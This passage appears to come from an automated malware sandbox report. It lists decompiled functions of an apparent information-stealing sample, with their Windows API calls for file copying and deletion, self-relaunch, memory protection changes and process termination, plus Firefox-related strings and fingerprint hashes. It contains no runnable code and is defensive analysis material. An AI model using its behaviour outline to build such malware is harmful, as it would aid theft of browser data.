                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02F168CA
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 02F1698D
                                                  • ExitProcess.KERNEL32 ref: 02F169BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction ID: 24a0fbad5d2d399d8251e9bccd5c78075dca78f702b328476c75e083ed82b693
                                                  • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction Fuzzy Hash: 37314DF1901218ABDB18EB90DD95FDEB77AAF04340F805189E309A6190EF746B88CF59
                                                  Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                  • ExitProcess.KERNEL32 ref: 00416755
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                  • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                  Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID: @Jn@$Jn@$Jn@
                                                  • API String ID: 544645111-1180188686
                                                  • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                  • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                  Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcatlstrcpy
                                                  • String ID: vI@$vI@
                                                  • API String ID: 3905823039-1245421781
                                                  • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                  • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                  Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                  • wsprintfW.USER32 ref: 00418D78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcesswsprintf
                                                  • String ID: %hs
                                                  • API String ID: 659108358-2783943728
                                                  • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                  • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                  Function 02F0A4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0A548
                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 02F0A666
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0A923
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0A9AA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction ID: 6ede23f1cd4e330f09dbd14e252c0a9c923184b1f510cad77e583338c815697d
                                                  • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction Fuzzy Hash: 74E1F072911218EBCB19FBA4DD90DEEB73AAF54740F908159E216B2090EF346B4CCF61
                                                  Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                  • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                  Function 02F0D667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0D6E8
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0D8FF
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0D913
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0D992
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                  • Instruction ID: 14dc24260c1c59991a65fa74555eb3ef6fef716065968e869d8bdb3ed6d018dc
                                                  • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                  • Instruction Fuzzy Hash: FE91FF72911218ABCB18FBA4DD94DEEB73AAF54740F90416DE607A2090FF346B48CF61
                                                  Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                  • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                  • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                  • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                  Function 02F0D9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0DA68
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0DC06
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0DC1A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0DC99
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                  • Instruction ID: 3a7403913f7ab5ae00d37f5857eb3a1feed36900af465f324784204d2bb7c877
                                                  • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                  • Instruction Fuzzy Hash: EF81FF72911218ABCB08FBE4DD94DEEB73AAF54740F90456DE606A6090FF346B48CF61
                                                  Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                  • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                  • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                  • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                  Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                  • API String ID: 998311485-3310892237
                                                  • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                  • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                  • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                  • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                  Function 02F19737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 02F19752
                                                    • Part of subcall function 02F18FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02F19785,00000000), ref: 02F18FC2
                                                    • Part of subcall function 02F18FB7: RtlAllocateHeap.NTDLL(00000000), ref: 02F18FC9
                                                    • Part of subcall function 02F18FB7: wsprintfW.USER32 ref: 02F18FDF
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 02F19812
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 02F19830
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F1983D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 3729781310-0
                                                  • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
